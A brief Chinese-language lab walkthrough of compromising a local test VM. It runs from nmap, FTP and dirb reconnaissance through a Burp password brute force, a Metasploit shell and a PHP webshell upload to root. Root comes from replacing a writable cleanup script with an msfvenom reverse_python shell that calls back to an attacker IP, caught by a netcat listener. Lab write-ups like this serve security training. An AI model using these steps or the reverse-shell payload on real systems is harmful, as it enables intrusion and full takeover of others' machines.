首先用nmap掃下 開放了什麼埠

看到有21埠的ftp服務 先進21埠看看

輸入 ftp://192.168.159.150 進入ftp伺服器 看到文件

應該是用戶名 先記下來

接著用dirb爆破一下域名 命令:dirb http://192.168.159.150

爆破後在robots.txt中發現了域名 是

訪問之後發現用戶有剛才發現的用戶 之後再頁面中找到了登錄的窗口 有了用戶名之後用burp爆破密碼

用戶名 John / enigma

有了用戶名密碼之後用msf拿shel

選好之後用show options 查看應該配置哪些選項

看到需要配置的有 PASSWORD RHOST USERNAME TARGETURI

全用set配置

運行後發現還沒有配置payload

之後運行命令 run或者 exploit

這個時候已經進來了 但是發現好像許可權還不夠

於是傳了一個大馬上去 命令 upload 大馬路徑 上傳成功後直接訪問

這個目錄就可以看到大馬了 最後的php換成自己大馬的名字 (如果上傳失敗 可能是所在目錄的許可權問題 可以嘗試切換所在目錄以後再試試上傳 上傳後的訪問目錄跟正常上傳的目錄訪問路徑一樣)

一陣提權之後發現 還是沒辦法拿到最高許可權 之後發現在「/usr/local/bin/」目錄下有個cleanup文件我們擁有操作的許可權。查看內容後發現 最上面的#/bin/sh 了解後知道它是用來清理日誌文件的,那麼肯定有足夠的許可權。於是從這裡生成一個反彈shell ,替換掉其中的內容,然後讓它執行

於是第一步先生成一個反彈shell 命令如下 msfvenom -p cmd/unix/reverse_python lhost=192.168.159.147 lport=1337 R -o cleanup

把生成文件的內容寫到伺服器中的cleanup文件中 接著本機開啟nc接收shell

nc -lvp 1337 不一會就接收到了反彈過來的shell 輸入whoami看到我們許可權是root許可權了 至此本次實驗結束


推薦閱讀:
相关文章